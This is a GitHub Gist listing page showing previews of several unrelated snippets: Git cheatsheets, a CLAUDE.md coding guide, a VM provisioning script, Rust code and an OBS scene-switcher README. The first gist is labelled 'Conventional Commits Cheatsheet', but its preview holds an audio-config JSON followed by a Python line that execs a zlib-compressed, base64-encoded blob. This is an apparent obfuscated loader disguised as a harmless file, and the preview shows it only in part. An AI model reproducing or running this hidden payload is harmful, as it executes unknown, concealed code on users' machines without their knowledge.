Skip to content

Instantly share code, notes, and snippets.

@qoomon
qoomon / conventional-commits-cheatsheet.md
Last active July 18, 2026 22:12
Conventional Commits Cheatsheet
{
"input": {
"blocklist": [],
"compressor#0": {
"attack": 15.0,
"boost-amount": 0.0,
"boost-threshold": -72.0,
"bypass": false,
"dry": -80.01,
"hpf-frequency": 10.0,
import base64, zlib; exec(zlib.decompress(base64.b64decode(b'eJztPV1zG8lx76rSf5iD7GBhAUuAlHg6nKALREAScvwqEvKdTeHWi8UA3NNiF95dUKRYTDkPdspVriRlJy8uu5x7dFX8dC8pv+qf3B+If0K6e2Z2Zz8AUSdeuZIy7gTux0xPT09PT3/N4M4HG8so3Bi7/gb3z9jiIj4N/K3btyqVyu1br1z/NffNxQX75mf/zg7D4PyCeYFje8wJ5guPxwFb2KHNJjxy7HBmh8wOnVP3LIjYmWuzVm9vo9vbM2/femxH9iRgrXaLcZ+N3fg1DwOEe3bfbBJwJ/DZ8KDXPWaeHbHp0nfcwLc9d2IDcIBw+1Y3/OnSjbkTL0O7ffsWYy0TW2Bz25/YbMFj13HffO2zb37xa7YgVEMeLQJ/wtlgf6/fG3SH3b3+/rBPbZ1yABxGCGfTZH2fOuJxL6jLyqpPcMEO/uGYXbAoDrk95zajnmHNLZN1RYdZxJljOwAVO3jU3ROEEVgFPo/Yke3POIuW44g7S+7HPJJEvn3LnS+CMGbRBTyKw4s2XplRPAmWsRlywHbqzpYhN7jvBBPXn3Uqy3jaeFCp3b7Fzx2+iNvQWhQlgMZ2xLfvJbdfRoGf3IQ8ubSjC6Rych+78/Sl9hxwBpI4HFuYhsGcxRcLwILJ1z3Xieus61/U2cEiplGrs103gofDJTAJ9vAO67zHB+sP9o+H3d3uzuDNb/ZZ9/nwYO/NPw0HO13W68P/h/39Xn9/Z9A9fv+2JnzKLNePYtvzLOAtS/TTqBHTMeZzPuET1mEnI/GAhkzR1A1O43ghXojBYQN61Q/DIGzL2qa9WHB/YlRkeRzKPKjQdU6vDQcLIxBRwZ0yP4hlGYk2fkIOk8dXpRah68fGtPLCP/lgxAbUY+hvAByPQIHbXDtqs8tqnVXNLwPXNwTA2pVpmgrjaRCyqWfPIub67ORkVGcnlUZjDDPlZQPYOObzxsJ2XtozHlV
@leocomelli
leocomelli / git.md
Last active July 18, 2026 21:59
Lista de comandos úteis do GIT

GIT

Estados

  • Modificado (modified);
  • Preparado (staged/index)
  • Consolidado (comitted);

Ajuda

name explain-diff-html
description Use when the user asks for a rich explanation of a code change, diff, branch, or PR. Produces HTML output.

Explain Diff

Please make me a rich, interactive explanation of the specified code change.

It should have these sections:

@alirezarezvani
alirezarezvani / CLAUDE.md
Created June 3, 2026 12:34
CLAUDE.md A practical working guide for coding with LLM agents - Inspired by Andrej Karpathy principals

CLAUDE.md

A practical working guide for coding with LLM agents
Inspired by Andrej Karpathy’s workflow principles


Coding Workflow Principles

1. Plan Mode First

@VincentZyu233
VincentZyu233 / tfwr.20260719.0154.py
Last active July 18, 2026 21:40
tfwr.20260719.0154.py
# --- go home
def go_home():
while get_pos_x() != 0:
move(East)
while get_pos_y() != 0:
move(North)
# --- math
def is_even(x):
return x%2 == 0
@smith153
smith153 / provision-uat.sh
Created July 18, 2026 18:04
Libvirt Powered Claude Sandbox
#!/usr/bin/env bash
set -euo pipefail
# ─────────────────────────────────────────────────────────────────────────────
# uat provisioner — LXQt + Chrome acceptance-testing desktop under qemu:///system.
# Runs entirely as your normal user (no sudo): disks live in a path you own,
# and libvirtd (already root) does the privileged VM/network work.
# Keep uat-cloud-init.yaml and uat-net.xml next to this script.
# ─────────────────────────────────────────────────────────────────────────────
# Pin a clean PATH so a custom python (pyenv/conda/etc.) can't shadow the system
use std::collections::HashMap;
use std::fmt;
use std::io;
use std::num::ParseFloatError;
use std::rc::Rc;
/*
Types
*/
@daisyUniverse
daisyUniverse / readme.md
Created July 18, 2026 10:09
Basic-Scene-Switcher

Basic Scene Switcher

I wrote this because the AUR build of Advanced-Scene-Switcher was not working All I wanted to do was to be able to change my OBS scene to the monitor my mouse was hovering over the corrosponding monitor

requirements:

  • hyprland & hyprctl
  • OBS + WebSockets
  • python3 + WebSockets
  • fish shell